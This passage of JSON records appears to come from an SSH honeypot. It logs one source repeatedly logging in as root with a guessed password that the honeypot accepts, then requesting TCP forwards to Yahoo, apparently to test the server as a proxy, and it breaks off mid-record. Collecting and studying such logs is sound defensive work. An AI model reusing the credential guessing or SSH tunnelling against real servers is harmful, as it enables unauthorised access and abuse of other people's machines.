{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:32.816527Z","src_ip":"213.209.150.239","session":"b64a47564bb8"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":9016,"dst_ip":"1.2.3.4","dst_port":22,"session":"dabf006ece3d","protocol":"ssh","message":"New connection: 213.209.150.239:9016 (1.2.3.4:22) [session: dabf006ece3d]","sensor":"my-vps","timestamp":"2025-08-26T01:00:32.862603Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:32.863317Z","src_ip":"213.209.150.239","session":"dabf006ece3d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:32.910537Z","src_ip":"213.209.150.239","session":"dabf006ece3d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:33.146177Z","src_ip":"213.209.150.239","session":"dabf006ece3d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":6562,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:6562","sensor":"my-vps","timestamp":"2025-08-26T01:00:33.194296Z","session":"dabf006ece3d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:33.241838Z","src_ip":"213.209.150.239","session":"dabf006ece3d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":32495,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:32495","sensor":"my-vps","timestamp":"2025-08-26T01:00:33.377644Z","session":"dabf006ece3d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:33.425063Z","src_ip":"213.209.150.239","session":"dabf006ece3d"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:33.473412Z","src_ip":"213.209.150.239","session":"dabf006ece3d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":9052,"dst_ip":"1.2.3.4","dst_port":22,"session":"5eb71866853f","protocol":"ssh","message":"New connection: 213.209.150.239:9052 (1.2.3.4:22) [session: 5eb71866853f]","sensor":"my-vps","timestamp":"2025-08-26T01:00:33.519445Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:33.520596Z","src_ip":"213.209.150.239","session":"5eb71866853f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:33.567895Z","src_ip":"213.209.150.239","session":"5eb71866853f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:33.802822Z","src_ip":"213.209.150.239","session":"5eb71866853f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":23898,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:23898","sensor":"my-vps","timestamp":"2025-08-26T01:00:33.851208Z","session":"5eb71866853f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:33.898530Z","src_ip":"213.209.150.239","session":"5eb71866853f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":10228,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:10228","sensor":"my-vps","timestamp":"2025-08-26T01:00:34.033596Z","session":"5eb71866853f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:34.080827Z","src_ip":"213.209.150.239","session":"5eb71866853f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:34.129126Z","src_ip":"213.209.150.239","session":"5eb71866853f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":9097,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac24aa2805f3","protocol":"ssh","message":"New connection: 213.209.150.239:9097 (1.2.3.4:22) [session: ac24aa2805f3]","sensor":"my-vps","timestamp":"2025-08-26T01:00:34.184897Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:34.185573Z","src_ip":"213.209.150.239","session":"ac24aa2805f3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:34.242787Z","src_ip":"213.209.150.239","session":"ac24aa2805f3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:34.525229Z","src_ip":"213.209.150.239","session":"ac24aa2805f3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":24472,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:24472","sensor":"my-vps","timestamp":"2025-08-26T01:00:34.582959Z","session":"ac24aa2805f3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:34.639736Z","src_ip":"213.209.150.239","session":"ac24aa2805f3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":19134,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:19134","sensor":"my-vps","timestamp":"2025-08-26T01:00:34.795053Z","session":"ac24aa2805f3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:34.851764Z","src_ip":"213.209.150.239","session":"ac24aa2805f3"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:34.909248Z","src_ip":"213.209.150.239","session":"ac24aa2805f3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":9146,"dst_ip":"1.2.3.4","dst_port":22,"session":"812b56ebc7be","protocol":"ssh","message":"New connection: 213.209.150.239:9146 (1.2.3.4:22) [session: 812b56ebc7be]","sensor":"my-vps","timestamp":"2025-08-26T01:00:34.955293Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:34.956177Z","src_ip":"213.209.150.239","session":"812b56ebc7be"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:35.003370Z","src_ip":"213.209.150.239","session":"812b56ebc7be"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:35.238477Z","src_ip":"213.209.150.239","session":"812b56ebc7be"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":14614,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:14614","sensor":"my-vps","timestamp":"2025-08-26T01:00:35.286851Z","session":"812b56ebc7be"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:35.334360Z","src_ip":"213.209.150.239","session":"812b56ebc7be"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":6379,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:6379","sensor":"my-vps","timestamp":"2025-08-26T01:00:35.469804Z","session":"812b56ebc7be"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:35.517952Z","src_ip":"213.209.150.239","session":"812b56ebc7be"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:35.566219Z","src_ip":"213.209.150.239","session":"812b56ebc7be"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":9190,"dst_ip":"1.2.3.4","dst_port":22,"session":"17faae0f315d","protocol":"ssh","message":"New connection: 213.209.150.239:9190 (1.2.3.4:22) [session: 17faae0f315d]","sensor":"my-vps","timestamp":"2025-08-26T01:00:35.621621Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:35.622289Z","src_ip":"213.209.150.239","session":"17faae0f315d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:35.679014Z","src_ip":"213.209.150.239","session":"17faae0f315d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:35.961563Z","src_ip":"213.209.150.239","session":"17faae0f315d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":5272,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:5272","sensor":"my-vps","timestamp":"2025-08-26T01:00:36.019155Z","session":"17faae0f315d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:36.079715Z","src_ip":"213.209.150.239","session":"17faae0f315d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":24717,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:24717","sensor":"my-vps","timestamp":"2025-08-26T01:00:36.235126Z","session":"17faae0f315d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:36.291906Z","src_ip":"213.209.150.239","session":"17faae0f315d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:36.349573Z","src_ip":"213.209.150.239","session":"17faae0f315d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":9252,"dst_ip":"1.2.3.4","dst_port":22,"session":"98ba1f3efd01","protocol":"ssh","message":"New connection: 213.209.150.239:9252 (1.2.3.4:22) [session: 98ba1f3efd01]","sensor":"my-vps","timestamp":"2025-08-26T01:00:36.395824Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:36.397076Z","src_ip":"213.209.150.239","session":"98ba1f3efd01"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com",